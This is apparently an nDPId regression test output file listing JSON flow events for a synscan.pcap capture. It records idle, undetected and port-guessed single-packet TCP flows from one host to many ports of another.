+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1216,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1217,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1218,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1218,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1218,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1218,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3268,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3268,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3268,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3268,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Git","breed":"Safe","category":"Collaborative"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Git","breed":"Safe","category":"Collaborative"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1233,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1234,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1233,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1234,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3283,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061155,"flow_last_seen":1278275061155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1236,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061155,"flow_last_seen":1278275061155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1236,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3283,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1236,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1236,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061111,"flow_last_seen":1278275061111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061111,"flow_last_seen":1278275061111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061213,"flow_last_seen":1278275061213,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061213,"flow_last_seen":1278275061213,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1244,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1244,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 